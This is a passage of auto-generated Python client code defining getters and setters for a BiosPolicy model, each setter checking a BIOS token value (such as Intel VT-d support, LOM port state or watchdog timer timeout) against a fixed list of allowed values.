:param frb2enable: The frb2enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if frb2enable not in allowed_values:
raise ValueError(
"Invalid value for `frb2enable` ({0}), must be one of {1}"
.format(frb2enable, allowed_values)
)
self._frb2enable = frb2enable
@property
def hardware_prefetch(self):
"""
Gets the hardware_prefetch of this BiosPolicy.
BIOS Token for setting Hardware Prefetcher configuration
:return: The hardware_prefetch of this BiosPolicy.
:rtype: str
"""
return self._hardware_prefetch
@hardware_prefetch.setter
def hardware_prefetch(self, hardware_prefetch):
"""
Sets the hardware_prefetch of this BiosPolicy.
BIOS Token for setting Hardware Prefetcher configuration
:param hardware_prefetch: The hardware_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if hardware_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `hardware_prefetch` ({0}), must be one of {1}"
.format(hardware_prefetch, allowed_values)
)
self._hardware_prefetch = hardware_prefetch
@property
def hwpm_enable(self):
"""
Gets the hwpm_enable of this BiosPolicy.
BIOS Token for setting CPU Hardware Power Management configuration
:return: The hwpm_enable of this BiosPolicy.
:rtype: str
"""
return self._hwpm_enable
@hwpm_enable.setter
def hwpm_enable(self, hwpm_enable):
"""
Sets the hwpm_enable of this BiosPolicy.
BIOS Token for setting CPU Hardware Power Management configuration
:param hwpm_enable: The hwpm_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Disabled", "HWPM Native Mode", "HWPM OOB Mode", "NATIVE MODE", "Native Mode with no Legacy", "OOB MODE"]
if hwpm_enable not in allowed_values:
raise ValueError(
"Invalid value for `hwpm_enable` ({0}), must be one of {1}"
.format(hwpm_enable, allowed_values)
)
self._hwpm_enable = hwpm_enable
@property
def imc_interleave(self):
"""
Gets the imc_interleave of this BiosPolicy.
BIOS Token for setting IMC Interleaving configuration
:return: The imc_interleave of this BiosPolicy.
:rtype: str
"""
return self._imc_interleave
@imc_interleave.setter
def imc_interleave(self, imc_interleave):
"""
Sets the imc_interleave of this BiosPolicy.
BIOS Token for setting IMC Interleaving configuration
:param imc_interleave: The imc_interleave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1-way Interleave", "2-way Interleave", "Auto"]
if imc_interleave not in allowed_values:
raise ValueError(
"Invalid value for `imc_interleave` ({0}), must be one of {1}"
.format(imc_interleave, allowed_values)
)
self._imc_interleave = imc_interleave
@property
def intel_hyper_threading_tech(self):
"""
Gets the intel_hyper_threading_tech of this BiosPolicy.
BIOS Token for setting Intel HyperThreading Tech configuration
:return: The intel_hyper_threading_tech of this BiosPolicy.
:rtype: str
"""
return self._intel_hyper_threading_tech
@intel_hyper_threading_tech.setter
def intel_hyper_threading_tech(self, intel_hyper_threading_tech):
"""
Sets the intel_hyper_threading_tech of this BiosPolicy.
BIOS Token for setting Intel HyperThreading Tech configuration
:param intel_hyper_threading_tech: The intel_hyper_threading_tech of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_hyper_threading_tech not in allowed_values:
raise ValueError(
"Invalid value for `intel_hyper_threading_tech` ({0}), must be one of {1}"
.format(intel_hyper_threading_tech, allowed_values)
)
self._intel_hyper_threading_tech = intel_hyper_threading_tech
@property
def intel_turbo_boost_tech(self):
"""
Gets the intel_turbo_boost_tech of this BiosPolicy.
BIOS Token for setting Intel Turbo Boost Tech configuration
:return: The intel_turbo_boost_tech of this BiosPolicy.
:rtype: str
"""
return self._intel_turbo_boost_tech
@intel_turbo_boost_tech.setter
def intel_turbo_boost_tech(self, intel_turbo_boost_tech):
"""
Sets the intel_turbo_boost_tech of this BiosPolicy.
BIOS Token for setting Intel Turbo Boost Tech configuration
:param intel_turbo_boost_tech: The intel_turbo_boost_tech of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_turbo_boost_tech not in allowed_values:
raise ValueError(
"Invalid value for `intel_turbo_boost_tech` ({0}), must be one of {1}"
.format(intel_turbo_boost_tech, allowed_values)
)
self._intel_turbo_boost_tech = intel_turbo_boost_tech
@property
def intel_virtualization_technology(self):
"""
Gets the intel_virtualization_technology of this BiosPolicy.
BIOS Token for setting Intel(R) VT configuration
:return: The intel_virtualization_technology of this BiosPolicy.
:rtype: str
"""
return self._intel_virtualization_technology
@intel_virtualization_technology.setter
def intel_virtualization_technology(self, intel_virtualization_technology):
"""
Sets the intel_virtualization_technology of this BiosPolicy.
BIOS Token for setting Intel(R) VT configuration
:param intel_virtualization_technology: The intel_virtualization_technology of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_virtualization_technology not in allowed_values:
raise ValueError(
"Invalid value for `intel_virtualization_technology` ({0}), must be one of {1}"
.format(intel_virtualization_technology, allowed_values)
)
self._intel_virtualization_technology = intel_virtualization_technology
@property
def intel_vt_for_directed_io(self):
"""
Gets the intel_vt_for_directed_io of this BiosPolicy.
BIOS Token for setting Intel VT for directed IO configuration
:return: The intel_vt_for_directed_io of this BiosPolicy.
:rtype: str
"""
return self._intel_vt_for_directed_io
@intel_vt_for_directed_io.setter
def intel_vt_for_directed_io(self, intel_vt_for_directed_io):
"""
Sets the intel_vt_for_directed_io of this BiosPolicy.
BIOS Token for setting Intel VT for directed IO configuration
:param intel_vt_for_directed_io: The intel_vt_for_directed_io of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vt_for_directed_io not in allowed_values:
raise ValueError(
"Invalid value for `intel_vt_for_directed_io` ({0}), must be one of {1}"
.format(intel_vt_for_directed_io, allowed_values)
)
self._intel_vt_for_directed_io = intel_vt_for_directed_io
@property
def intel_vtd_coherency_support(self):
"""
Gets the intel_vtd_coherency_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Coherency Support configuration
:return: The intel_vtd_coherency_support of this BiosPolicy.
:rtype: str
"""
return self._intel_vtd_coherency_support
@intel_vtd_coherency_support.setter
def intel_vtd_coherency_support(self, intel_vtd_coherency_support):
"""
Sets the intel_vtd_coherency_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Coherency Support configuration
:param intel_vtd_coherency_support: The intel_vtd_coherency_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtd_coherency_support not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtd_coherency_support` ({0}), must be one of {1}"
.format(intel_vtd_coherency_support, allowed_values)
)
self._intel_vtd_coherency_support = intel_vtd_coherency_support
@property
def intel_vtd_interrupt_remapping(self):
"""
Gets the intel_vtd_interrupt_remapping of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Interrupt Remapping configuration
:return: The intel_vtd_interrupt_remapping of this BiosPolicy.
:rtype: str
"""
return self._intel_vtd_interrupt_remapping
@intel_vtd_interrupt_remapping.setter
def intel_vtd_interrupt_remapping(self, intel_vtd_interrupt_remapping):
"""
Sets the intel_vtd_interrupt_remapping of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d Interrupt Remapping configuration
:param intel_vtd_interrupt_remapping: The intel_vtd_interrupt_remapping of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtd_interrupt_remapping not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtd_interrupt_remapping` ({0}), must be one of {1}"
.format(intel_vtd_interrupt_remapping, allowed_values)
)
self._intel_vtd_interrupt_remapping = intel_vtd_interrupt_remapping
@property
def intel_vtd_pass_through_dma_support(self):
"""
Gets the intel_vtd_pass_through_dma_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d PassThrough DMA support configuration
:return: The intel_vtd_pass_through_dma_support of this BiosPolicy.
:rtype: str
"""
return self._intel_vtd_pass_through_dma_support
@intel_vtd_pass_through_dma_support.setter
def intel_vtd_pass_through_dma_support(self, intel_vtd_pass_through_dma_support):
"""
Sets the intel_vtd_pass_through_dma_support of this BiosPolicy.
BIOS Token for setting Intel(R) VT-d PassThrough DMA support configuration
:param intel_vtd_pass_through_dma_support: The intel_vtd_pass_through_dma_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtd_pass_through_dma_support not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtd_pass_through_dma_support` ({0}), must be one of {1}"
.format(intel_vtd_pass_through_dma_support, allowed_values)
)
self._intel_vtd_pass_through_dma_support = intel_vtd_pass_through_dma_support
@property
def intel_vtdats_support(self):
"""
Gets the intel_vtdats_support of this BiosPolicy.
BIOS Token for setting Intel VTD ATS support configuration
:return: The intel_vtdats_support of this BiosPolicy.
:rtype: str
"""
return self._intel_vtdats_support
@intel_vtdats_support.setter
def intel_vtdats_support(self, intel_vtdats_support):
"""
Sets the intel_vtdats_support of this BiosPolicy.
BIOS Token for setting Intel VTD ATS support configuration
:param intel_vtdats_support: The intel_vtdats_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if intel_vtdats_support not in allowed_values:
raise ValueError(
"Invalid value for `intel_vtdats_support` ({0}), must be one of {1}"
.format(intel_vtdats_support, allowed_values)
)
self._intel_vtdats_support = intel_vtdats_support
@property
def ioh_error_enable(self):
"""
Gets the ioh_error_enable of this BiosPolicy.
BIOS Token for setting IIO Error Enable configuration
:return: The ioh_error_enable of this BiosPolicy.
:rtype: str
"""
return self._ioh_error_enable
@ioh_error_enable.setter
def ioh_error_enable(self, ioh_error_enable):
"""
Sets the ioh_error_enable of this BiosPolicy.
BIOS Token for setting IIO Error Enable configuration
:param ioh_error_enable: The ioh_error_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "No", "Yes"]
if ioh_error_enable not in allowed_values:
raise ValueError(
"Invalid value for `ioh_error_enable` ({0}), must be one of {1}"
.format(ioh_error_enable, allowed_values)
)
self._ioh_error_enable = ioh_error_enable
@property
def ioh_resource(self):
"""
Gets the ioh_resource of this BiosPolicy.
BIOS Token for setting IOH Resource Allocation configuration
:return: The ioh_resource of this BiosPolicy.
:rtype: str
"""
return self._ioh_resource
@ioh_resource.setter
def ioh_resource(self, ioh_resource):
"""
Sets the ioh_resource of this BiosPolicy.
BIOS Token for setting IOH Resource Allocation configuration
:param ioh_resource: The ioh_resource of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "IOH0 24k IOH1 40k", "IOH0 32k IOH1 32k", "IOH0 40k IOH1 24k", "IOH0 48k IOH1 16k", "IOH0 56k IOH1 8k"]
if ioh_resource not in allowed_values:
raise ValueError(
"Invalid value for `ioh_resource` ({0}), must be one of {1}"
.format(ioh_resource, allowed_values)
)
self._ioh_resource = ioh_resource
@property
def ip_prefetch(self):
"""
Gets the ip_prefetch of this BiosPolicy.
BIOS Token for setting DCU IP Prefetcher configuration
:return: The ip_prefetch of this BiosPolicy.
:rtype: str
"""
return self._ip_prefetch
@ip_prefetch.setter
def ip_prefetch(self, ip_prefetch):
"""
Sets the ip_prefetch of this BiosPolicy.
BIOS Token for setting DCU IP Prefetcher configuration
:param ip_prefetch: The ip_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if ip_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `ip_prefetch` ({0}), must be one of {1}"
.format(ip_prefetch, allowed_values)
)
self._ip_prefetch = ip_prefetch
@property
def ipv6pxe(self):
"""
Gets the ipv6pxe of this BiosPolicy.
BIOS Token for setting IPV6 PXE Support configuration
:return: The ipv6pxe of this BiosPolicy.
:rtype: str
"""
return self._ipv6pxe
@ipv6pxe.setter
def ipv6pxe(self, ipv6pxe):
"""
Sets the ipv6pxe of this BiosPolicy.
BIOS Token for setting IPV6 PXE Support configuration
:param ipv6pxe: The ipv6pxe of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if ipv6pxe not in allowed_values:
raise ValueError(
"Invalid value for `ipv6pxe` ({0}), must be one of {1}"
.format(ipv6pxe, allowed_values)
)
self._ipv6pxe = ipv6pxe
@property
def kti_prefetch(self):
"""
Gets the kti_prefetch of this BiosPolicy.
BIOS Token for setting KTI Prefetch configuration
:return: The kti_prefetch of this BiosPolicy.
:rtype: str
"""
return self._kti_prefetch
@kti_prefetch.setter
def kti_prefetch(self, kti_prefetch):
"""
Sets the kti_prefetch of this BiosPolicy.
BIOS Token for setting KTI Prefetch configuration
:param kti_prefetch: The kti_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if kti_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `kti_prefetch` ({0}), must be one of {1}"
.format(kti_prefetch, allowed_values)
)
self._kti_prefetch = kti_prefetch
@property
def legacy_os_redirection(self):
"""
Gets the legacy_os_redirection of this BiosPolicy.
BIOS Token for setting Legacy OS redirection configuration
:return: The legacy_os_redirection of this BiosPolicy.
:rtype: str
"""
return self._legacy_os_redirection
@legacy_os_redirection.setter
def legacy_os_redirection(self, legacy_os_redirection):
"""
Sets the legacy_os_redirection of this BiosPolicy.
BIOS Token for setting Legacy OS redirection configuration
:param legacy_os_redirection: The legacy_os_redirection of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if legacy_os_redirection not in allowed_values:
raise ValueError(
"Invalid value for `legacy_os_redirection` ({0}), must be one of {1}"
.format(legacy_os_redirection, allowed_values)
)
self._legacy_os_redirection = legacy_os_redirection
@property
def legacy_usb_support(self):
"""
Gets the legacy_usb_support of this BiosPolicy.
BIOS Token for setting Legacy USB Support configuration
:return: The legacy_usb_support of this BiosPolicy.
:rtype: str
"""
return self._legacy_usb_support
@legacy_usb_support.setter
def legacy_usb_support(self, legacy_usb_support):
"""
Sets the legacy_usb_support of this BiosPolicy.
BIOS Token for setting Legacy USB Support configuration
:param legacy_usb_support: The legacy_usb_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "disabled", "enabled"]
if legacy_usb_support not in allowed_values:
raise ValueError(
"Invalid value for `legacy_usb_support` ({0}), must be one of {1}"
.format(legacy_usb_support, allowed_values)
)
self._legacy_usb_support = legacy_usb_support
@property
def llc_prefetch(self):
"""
Gets the llc_prefetch of this BiosPolicy.
BIOS Token for setting LLC Prefetch configuration
:return: The llc_prefetch of this BiosPolicy.
:rtype: str
"""
return self._llc_prefetch
@llc_prefetch.setter
def llc_prefetch(self, llc_prefetch):
"""
Sets the llc_prefetch of this BiosPolicy.
BIOS Token for setting LLC Prefetch configuration
:param llc_prefetch: The llc_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if llc_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `llc_prefetch` ({0}), must be one of {1}"
.format(llc_prefetch, allowed_values)
)
self._llc_prefetch = llc_prefetch
@property
def lom_port0state(self):
"""
Gets the lom_port0state of this BiosPolicy.
BIOS Token for setting LOM Port 0 OptionROM configuration
:return: The lom_port0state of this BiosPolicy.
:rtype: str
"""
return self._lom_port0state
@lom_port0state.setter
def lom_port0state(self, lom_port0state):
"""
Sets the lom_port0state of this BiosPolicy.
BIOS Token for setting LOM Port 0 OptionROM configuration
:param lom_port0state: The lom_port0state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port0state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port0state` ({0}), must be one of {1}"
.format(lom_port0state, allowed_values)
)
self._lom_port0state = lom_port0state
@property
def lom_port1state(self):
"""
Gets the lom_port1state of this BiosPolicy.
BIOS Token for setting LOM Port 1 OptionRom configuration
:return: The lom_port1state of this BiosPolicy.
:rtype: str
"""
return self._lom_port1state
@lom_port1state.setter
def lom_port1state(self, lom_port1state):
"""
Sets the lom_port1state of this BiosPolicy.
BIOS Token for setting LOM Port 1 OptionRom configuration
:param lom_port1state: The lom_port1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port1state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port1state` ({0}), must be one of {1}"
.format(lom_port1state, allowed_values)
)
self._lom_port1state = lom_port1state
@property
def lom_port2state(self):
"""
Gets the lom_port2state of this BiosPolicy.
BIOS Token for setting LOM Port 2 OptionRom configuration
:return: The lom_port2state of this BiosPolicy.
:rtype: str
"""
return self._lom_port2state
@lom_port2state.setter
def lom_port2state(self, lom_port2state):
"""
Sets the lom_port2state of this BiosPolicy.
BIOS Token for setting LOM Port 2 OptionRom configuration
:param lom_port2state: The lom_port2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port2state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port2state` ({0}), must be one of {1}"
.format(lom_port2state, allowed_values)
)
self._lom_port2state = lom_port2state
@property
def lom_port3state(self):
"""
Gets the lom_port3state of this BiosPolicy.
BIOS Token for setting LOM Port 3 OptionRom configuration
:return: The lom_port3state of this BiosPolicy.
:rtype: str
"""
return self._lom_port3state
@lom_port3state.setter
def lom_port3state(self, lom_port3state):
"""
Sets the lom_port3state of this BiosPolicy.
BIOS Token for setting LOM Port 3 OptionRom configuration
:param lom_port3state: The lom_port3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port3state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port3state` ({0}), must be one of {1}"
.format(lom_port3state, allowed_values)
)
self._lom_port3state = lom_port3state
@property
def lom_ports_all_state(self):
"""
Gets the lom_ports_all_state of this BiosPolicy.
BIOS Token for setting All Onboard LOM Ports configuration
:return: The lom_ports_all_state of this BiosPolicy.
:rtype: str
"""
return self._lom_ports_all_state
@lom_ports_all_state.setter
def lom_ports_all_state(self, lom_ports_all_state):
"""
Sets the lom_ports_all_state of this BiosPolicy.
BIOS Token for setting All Onboard LOM Ports configuration
:param lom_ports_all_state: The lom_ports_all_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if lom_ports_all_state not in allowed_values:
raise ValueError(
"Invalid value for `lom_ports_all_state` ({0}), must be one of {1}"
.format(lom_ports_all_state, allowed_values)
)
self._lom_ports_all_state = lom_ports_all_state
@property
def lv_ddr_mode(self):
"""
Gets the lv_ddr_mode of this BiosPolicy.
BIOS Token for setting Low Voltage DDR Mode configuration
:return: The lv_ddr_mode of this BiosPolicy.
:rtype: str
"""
return self._lv_ddr_mode
@lv_ddr_mode.setter
def lv_ddr_mode(self, lv_ddr_mode):
"""
Sets the lv_ddr_mode of this BiosPolicy.
BIOS Token for setting Low Voltage DDR Mode configuration
:param lv_ddr_mode: The lv_ddr_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "performance-mode", "power-saving-mode"]
if lv_ddr_mode not in allowed_values:
raise ValueError(
"Invalid value for `lv_ddr_mode` ({0}), must be one of {1}"
.format(lv_ddr_mode, allowed_values)
)
self._lv_ddr_mode = lv_ddr_mode
@property
def make_device_non_bootable(self):
"""
Gets the make_device_non_bootable of this BiosPolicy.
BIOS Token for setting Make Device Non Bootable configuration
:return: The make_device_non_bootable of this BiosPolicy.
:rtype: str
"""
return self._make_device_non_bootable
@make_device_non_bootable.setter
def make_device_non_bootable(self, make_device_non_bootable):
"""
Sets the make_device_non_bootable of this BiosPolicy.
BIOS Token for setting Make Device Non Bootable configuration
:param make_device_non_bootable: The make_device_non_bootable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if make_device_non_bootable not in allowed_values:
raise ValueError(
"Invalid value for `make_device_non_bootable` ({0}), must be one of {1}"
.format(make_device_non_bootable, allowed_values)
)
self._make_device_non_bootable = make_device_non_bootable
@property
def memory_inter_leave(self):
"""
Gets the memory_inter_leave of this BiosPolicy.
BIOS Token for setting Memory Interleaving configuration
:return: The memory_inter_leave of this BiosPolicy.
:rtype: str
"""
return self._memory_inter_leave
@memory_inter_leave.setter
def memory_inter_leave(self, memory_inter_leave):
"""
Sets the memory_inter_leave of this BiosPolicy.
BIOS Token for setting Memory Interleaving configuration
:param memory_inter_leave: The memory_inter_leave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1 Way Node Interleave", "2 Way Node Interleave", "4 Way Node Interleave", "8 Way Node Interleave", "disabled", "enabled"]
if memory_inter_leave not in allowed_values:
raise ValueError(
"Invalid value for `memory_inter_leave` ({0}), must be one of {1}"
.format(memory_inter_leave, allowed_values)
)
self._memory_inter_leave = memory_inter_leave
@property
def memory_mapped_io_above4gb(self):
"""
Gets the memory_mapped_io_above4gb of this BiosPolicy.
BIOS Token for setting Memory mapped IO above 4GB configuration
:return: The memory_mapped_io_above4gb of this BiosPolicy.
:rtype: str
"""
return self._memory_mapped_io_above4gb
@memory_mapped_io_above4gb.setter
def memory_mapped_io_above4gb(self, memory_mapped_io_above4gb):
"""
Sets the memory_mapped_io_above4gb of this BiosPolicy.
BIOS Token for setting Memory mapped IO above 4GB configuration
:param memory_mapped_io_above4gb: The memory_mapped_io_above4gb of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if memory_mapped_io_above4gb not in allowed_values:
raise ValueError(
"Invalid value for `memory_mapped_io_above4gb` ({0}), must be one of {1}"
.format(memory_mapped_io_above4gb, allowed_values)
)
self._memory_mapped_io_above4gb = memory_mapped_io_above4gb
@property
def mirroring_mode(self):
"""
Gets the mirroring_mode of this BiosPolicy.
BIOS Token for setting Mirroring Mode configuration
:return: The mirroring_mode of this BiosPolicy.
:rtype: str
"""
return self._mirroring_mode
@mirroring_mode.setter
def mirroring_mode(self, mirroring_mode):
"""
Sets the mirroring_mode of this BiosPolicy.
BIOS Token for setting Mirroring Mode configuration
:param mirroring_mode: The mirroring_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "inter-socket", "intra-socket"]
if mirroring_mode not in allowed_values:
raise ValueError(
"Invalid value for `mirroring_mode` ({0}), must be one of {1}"
.format(mirroring_mode, allowed_values)
)
self._mirroring_mode = mirroring_mode
@property
def mmcfg_base(self):
"""
Gets the mmcfg_base of this BiosPolicy.
BIOS Token for setting MMCFG BASE configuration
:return: The mmcfg_base of this BiosPolicy.
:rtype: str
"""
return self._mmcfg_base
@mmcfg_base.setter
def mmcfg_base(self, mmcfg_base):
"""
Sets the mmcfg_base of this BiosPolicy.
BIOS Token for setting MMCFG BASE configuration
:param mmcfg_base: The mmcfg_base of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1 GB", "2 GB", "2.5 GB", "3 GB", "Auto"]
if mmcfg_base not in allowed_values:
raise ValueError(
"Invalid value for `mmcfg_base` ({0}), must be one of {1}"
.format(mmcfg_base, allowed_values)
)
self._mmcfg_base = mmcfg_base
@property
def numa_optimized(self):
"""
Gets the numa_optimized of this BiosPolicy.
BIOS Token for setting NUMA optimized configuration
:return: The numa_optimized of this BiosPolicy.
:rtype: str
"""
return self._numa_optimized
@numa_optimized.setter
def numa_optimized(self, numa_optimized):
"""
Sets the numa_optimized of this BiosPolicy.
BIOS Token for setting NUMA optimized configuration
:param numa_optimized: The numa_optimized of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if numa_optimized not in allowed_values:
raise ValueError(
"Invalid value for `numa_optimized` ({0}), must be one of {1}"
.format(numa_optimized, allowed_values)
)
self._numa_optimized = numa_optimized
@property
def onboard10gbit_lom(self):
"""
Gets the onboard10gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard 10Gbit LOM configuration
:return: The onboard10gbit_lom of this BiosPolicy.
:rtype: str
"""
return self._onboard10gbit_lom
@onboard10gbit_lom.setter
def onboard10gbit_lom(self, onboard10gbit_lom):
"""
Sets the onboard10gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard 10Gbit LOM configuration
:param onboard10gbit_lom: The onboard10gbit_lom of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if onboard10gbit_lom not in allowed_values:
raise ValueError(
"Invalid value for `onboard10gbit_lom` ({0}), must be one of {1}"
.format(onboard10gbit_lom, allowed_values)
)
self._onboard10gbit_lom = onboard10gbit_lom
@property
def onboard_gbit_lom(self):
"""
Gets the onboard_gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard Gbit LOM configuration
:return: The onboard_gbit_lom of this BiosPolicy.
:rtype: str
"""
return self._onboard_gbit_lom
@onboard_gbit_lom.setter
def onboard_gbit_lom(self, onboard_gbit_lom):
"""
Sets the onboard_gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard Gbit LOM configuration
:param onboard_gbit_lom: The onboard_gbit_lom of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if onboard_gbit_lom not in allowed_values:
raise ValueError(
"Invalid value for `onboard_gbit_lom` ({0}), must be one of {1}"
.format(onboard_gbit_lom, allowed_values)
)
self._onboard_gbit_lom = onboard_gbit_lom
@property
def onboard_scu_storage_support(self):
"""
Gets the onboard_scu_storage_support of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage Support configuration
:return: The onboard_scu_storage_support of this BiosPolicy.
:rtype: str
"""
return self._onboard_scu_storage_support
@onboard_scu_storage_support.setter
def onboard_scu_storage_support(self, onboard_scu_storage_support):
"""
Sets the onboard_scu_storage_support of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage Support configuration
:param onboard_scu_storage_support: The onboard_scu_storage_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if onboard_scu_storage_support not in allowed_values:
raise ValueError(
"Invalid value for `onboard_scu_storage_support` ({0}), must be one of {1}"
.format(onboard_scu_storage_support, allowed_values)
)
self._onboard_scu_storage_support = onboard_scu_storage_support
@property
def onboard_scu_storage_sw_stack(self):
"""
Gets the onboard_scu_storage_sw_stack of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage SW Stack configuration
:return: The onboard_scu_storage_sw_stack of this BiosPolicy.
:rtype: str
"""
return self._onboard_scu_storage_sw_stack
@onboard_scu_storage_sw_stack.setter
def onboard_scu_storage_sw_stack(self, onboard_scu_storage_sw_stack):
"""
Sets the onboard_scu_storage_sw_stack of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage SW Stack configuration
:param onboard_scu_storage_sw_stack: The onboard_scu_storage_sw_stack of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Intel RSTe", "LSI SW RAID"]
if onboard_scu_storage_sw_stack not in allowed_values:
raise ValueError(
"Invalid value for `onboard_scu_storage_sw_stack` ({0}), must be one of {1}"
.format(onboard_scu_storage_sw_stack, allowed_values)
)
self._onboard_scu_storage_sw_stack = onboard_scu_storage_sw_stack
@property
def organization(self):
"""
Gets the organization of this BiosPolicy.
Organization
:return: The organization of this BiosPolicy.
:rtype: IamAccountRef
"""
return self._organization
@organization.setter
def organization(self, organization):
"""
Sets the organization of this BiosPolicy.
Organization
:param organization: The organization of this BiosPolicy.
:type: IamAccountRef
"""
self._organization = organization
@property
def os_boot_watchdog_timer(self):
"""
Gets the os_boot_watchdog_timer of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer configuration
:return: The os_boot_watchdog_timer of this BiosPolicy.
:rtype: str
"""
return self._os_boot_watchdog_timer
@os_boot_watchdog_timer.setter
def os_boot_watchdog_timer(self, os_boot_watchdog_timer):
"""
Sets the os_boot_watchdog_timer of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer configuration
:param os_boot_watchdog_timer: The os_boot_watchdog_timer of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if os_boot_watchdog_timer not in allowed_values:
raise ValueError(
"Invalid value for `os_boot_watchdog_timer` ({0}), must be one of {1}"
.format(os_boot_watchdog_timer, allowed_values)
)
self._os_boot_watchdog_timer = os_boot_watchdog_timer
@property
def os_boot_watchdog_timer_policy(self):
"""
Gets the os_boot_watchdog_timer_policy of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Policy configuration
:return: The os_boot_watchdog_timer_policy of this BiosPolicy.
:rtype: str
"""
return self._os_boot_watchdog_timer_policy
@os_boot_watchdog_timer_policy.setter
def os_boot_watchdog_timer_policy(self, os_boot_watchdog_timer_policy):
"""
Sets the os_boot_watchdog_timer_policy of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Policy configuration
:param os_boot_watchdog_timer_policy: The os_boot_watchdog_timer_policy of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "do-nothing", "power-off", "reset"]
if os_boot_watchdog_timer_policy not in allowed_values:
raise ValueError(
"Invalid value for `os_boot_watchdog_timer_policy` ({0}), must be one of {1}"
.format(os_boot_watchdog_timer_policy, allowed_values)
)
self._os_boot_watchdog_timer_policy = os_boot_watchdog_timer_policy
@property
def os_boot_watchdog_timer_timeout(self):
"""
Gets the os_boot_watchdog_timer_timeout of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Timeout configuration
:return: The os_boot_watchdog_timer_timeout of this BiosPolicy.
:rtype: str
"""
return self._os_boot_watchdog_timer_timeout
@os_boot_watchdog_timer_timeout.setter
def os_boot_watchdog_timer_timeout(self, os_boot_watchdog_timer_timeout):
"""
Sets the os_boot_watchdog_timer_timeout of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Timeout configuration
:param os_boot_watchdog_timer_timeout: The os_boot_watchdog_timer_timeout of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "10-minutes", "15-minutes", "20-minutes", "5-minutes"]
if os_boot_watchdog_timer_timeout not in allowed_values:
raise ValueError(
